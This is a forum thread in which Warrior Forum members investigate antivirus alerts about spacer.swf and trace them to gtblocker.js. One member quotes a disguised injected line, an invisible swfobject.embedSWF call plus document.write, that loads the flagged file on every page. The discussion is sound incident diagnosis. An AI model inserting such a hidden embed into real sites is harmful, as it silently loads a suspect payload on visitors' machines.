Malicious spacer url on Warrior Forum!

20 replies
Is anyone seeing an alert about a malicious spacer URL on every page load in the WF?

I am using Kaspersky Internet Security

AussieT
#forum #malicious #spacer #url #warrior
  • Profile picture of the author topnichewebsites
    Nope, not i
    Signature
    http://pixelcovers.com/ <- eBook add eCovers

    https://www.unicommercesolutions.com <- WordPress Websites and Maintenance
    {{ DiscussionBoard.errors[8592796].message }}
  • Profile picture of the author JennySweets
    Yes! I came here to mention this too - I use ZoneAlarm and every time I load in anywhere here I get this

    FILENAME : spacer.swf TYPE: Virus RISK: High TREATMENT: Treated PATH: http://www.warriorforum.com/images/spacer.swf


    ZoneAlarm
    Antivirus web scanning detected a malicious link
    To protect you, this page has been blocked.
    URL:
    http://www.warriorforum.com/images/spacer.swf

    Been happening the last few hours.
    {{ DiscussionBoard.errors[8592798].message }}
  • Profile picture of the author Steve Wells
    Ive notified Paul Meyers, he knows about this for sure, he is/was befuddled, but I am sure they are looking into this...
    {{ DiscussionBoard.errors[8592827].message }}
  • Profile picture of the author salegurus
    Yip, also getting it...
    Signature
    Think of how stupid the average person is, and realize half of them are stupider than that.

    ― George Carlin
    {{ DiscussionBoard.errors[8592838].message }}
    • Profile picture of the author Paul Myers
      The weird thing is, I can't find any reference to a file named spacer.swf in the source of any page that isn't discussing this problem.


      Paul
      Signature
      .
      Stop by Paul's Pub - my little hangout on Facebook.

      {{ DiscussionBoard.errors[8593007].message }}
      • Profile picture of the author Joseph Then
        Originally Posted by Paul Myers View Post

        The weird thing is, I can't find any reference to a file named spacer.swf in the source of any page that isn't discussing this problem.
        Paul
        I didn't get any, maybe I'm using a mac. :p

        But, just to be sure, do you think you should contact the hosting company to help out? The hosting company usually have a virus scanner that scans the entire server.
        {{ DiscussionBoard.errors[8593008].message }}
      • Profile picture of the author sbucciarel
        Banned
        Originally Posted by Paul Myers View Post

        The weird thing is, I can't find any reference to a file named spacer.swf in the source of any page that isn't discussing this problem.

        Paul
        I know nothing about this really, but when I report cookie stuffers, the url used is often an alturl url but the cookie being stuffed is their website url, so some kind of workaround/redirect?

        EDIT: I see it's been fixed.
        {{ DiscussionBoard.errors[8593667].message }}
  • Profile picture of the author Andrew Davis
    The problem is likely being caused by this:
    http://www.warriorforum.com/gtblocker.js

    view-source:
    <script type="text/javascript" src="/gtblocker.js"></script>
    Signature
    Owner of: TrinSite, iOrbix, DesignCoverPhoto, KeywordCompetition ...and other Businesses


    Only $20! - >> Get your own PROFESSIONAL Facebook Timeline Cover << - Best Price - Best Quality
    (We are the #1 Facebook Cover Design Team in the WORLD!)
    {{ DiscussionBoard.errors[8593048].message }}
    • Profile picture of the author Steve Wells
      Originally Posted by Andrew Davis View Post

      The problem is likely being caused by this:
      http://www.warriorforum.com/gtblocker.js
      it does have the file name "images/spacer.swf" in it for sure....

      you may be on to something....
      {{ DiscussionBoard.errors[8593051].message }}
      • Profile picture of the author Kay King
        Getting the same errors - malicious-spacer and then gtblocker.js as the most recent error

        In firefox I get message "plugins deactivated for safety" and a reference to Java toolkit.
        Signature

        Saving one dog will not change the world - but forever changes the world for one dog.
        ***
        Sometimes people come into your life and they need to stop doing that...
        {{ DiscussionBoard.errors[8593067].message }}
        • Profile picture of the author Red Eagle
          [DELETED]
          {{ DiscussionBoard.errors[8593081].message }}
          • Profile picture of the author Paul Myers
            Andrew,

            Thanks. That's something I can point Thomas to. And it explains why I'm not seeing a filename when it's clearly being referenced somewhere.

            Much appreciated.

            It's very likely a false alarm, but it's better to look than not.


            Paul
            Signature
            .
            Stop by Paul's Pub - my little hangout on Facebook.

            {{ DiscussionBoard.errors[8593116].message }}
            • Profile picture of the author saunds
              PAUL MYERS: HOPE YOU LISTEN TO THAT JAMES BORG FELLA!

              MY COMPUTERS ACTIN REAL FUNNY LIKE SINCE I MADE A POST ON YOUR WEBSITE!

              Originally Posted by May not be a false alarm. Check the Oct 8 version of the file:

              [URL="http://web.archive.org/web/20131008014506/http://www.warriorforum.com/gtblocker.js

              http://web.archive.org/web/201310080...m/gtblocker.js[/URL]

              A second line of obfuscated javascript has been added that pulls in the spacer.swf file. They've even taken pains to make it look as if it's part of gtblocker:

              Code:
              swfobject.embedSWF("http://www.warriorforum.com/images/spacer.swf","gtblocker","1","1","9.0"); document.write('<div id="gtblocker"></div>');
              Update: Looked at other sites using gtblocker.js, specifically version 2.3. None of them have that second line that pulls in spacer.swf."]
              {{ DiscussionBoard.errors[8593281].message }}
    • Profile picture of the author mojojuju
      Originally Posted by Andrew Davis View Post

      The problem is likely being caused by this:
      http://www.warriorforum.com/gtblocker.js

      view-source:
      <script type="text/javascript" src="/gtblocker.js"></script>
      Goodness, why on earth is this forum still using that JavaScript to block the Google Side Wiki service - it's been discontinued for nearly 2 years!:p

      edit: I just recalled that I brought this up over a year ago here http://www.warriorforum.com/main-int...cript-now.html :rolleyes:
      Signature

      :)

      {{ DiscussionBoard.errors[8593162].message }}
  • Profile picture of the author Andrew Davis
    You're very welcomed Paul.

    Most likely, this script (gtblocker.js) was installed years ago, and has been forgotten in the WF source code.

    Apparently it's purpose was to block "Google Sidewiki" (which is now discontinued): Google Sidewiki

    Recent Virus Definitions seem to consider the "spacer.swf" as a threat for some reason; most likely a false alarm, as you said.

    I think it would be safe for you or some Admin/Developer to remove that portion of code (below), and the script (gtblocker.js) from WF.

    <script type="text/javascript" src="/gtblocker.js"></script>

    Best regards!
    Signature
    Owner of: TrinSite, iOrbix, DesignCoverPhoto, KeywordCompetition ...and other Businesses


    Only $20! - >> Get your own PROFESSIONAL Facebook Timeline Cover << - Best Price - Best Quality
    (We are the #1 Facebook Cover Design Team in the WORLD!)
    {{ DiscussionBoard.errors[8593152].message }}
  • Profile picture of the author JamesBorg
    May not be a false alarm. Check the Oct 8 version of the file:

    http://web.archive.org/web/201310080...m/gtblocker.js

    A second line of obfuscated javascript has been added that pulls in the spacer.swf file. They've even taken pains to make it look as if it's part of gtblocker:

    Code:
    swfobject.embedSWF("http://www.warriorforum.com/images/spacer.swf","gtblocker","1","1","9.0"); document.write('<div id="gtblocker"></div>');
    Update: Looked at other sites using gtblocker.js, specifically version 2.3. None of them have that second line that pulls in spacer.swf.
    {{ DiscussionBoard.errors[8593193].message }}
  • Profile picture of the author AussieT
    Thankfully is being blocked by my virus software just in case it is malicious
    {{ DiscussionBoard.errors[8593276].message }}
  • Profile picture of the author xgnxghmchzhuang
    Banned
    [DELETED]
    {{ DiscussionBoard.errors[8593406].message }}
    • Profile picture of the author Horny Devil
      Banned
      The last 48hrs most of my visits to WF have resulted in Shockwave crashing. This has never happened before.
      {{ DiscussionBoard.errors[8593455].message }}
  • Profile picture of the author ecoverdesign
    Hello,

    the issue should have been fixed. Can you please check again to see if you still get the warning?

    Thanks!

    Thomas
    Signature

    Graphics Design, Development and Webmaster Services
    http://www.tbitdesign.com

    {{ DiscussionBoard.errors[8593510].message }}

Trending Topics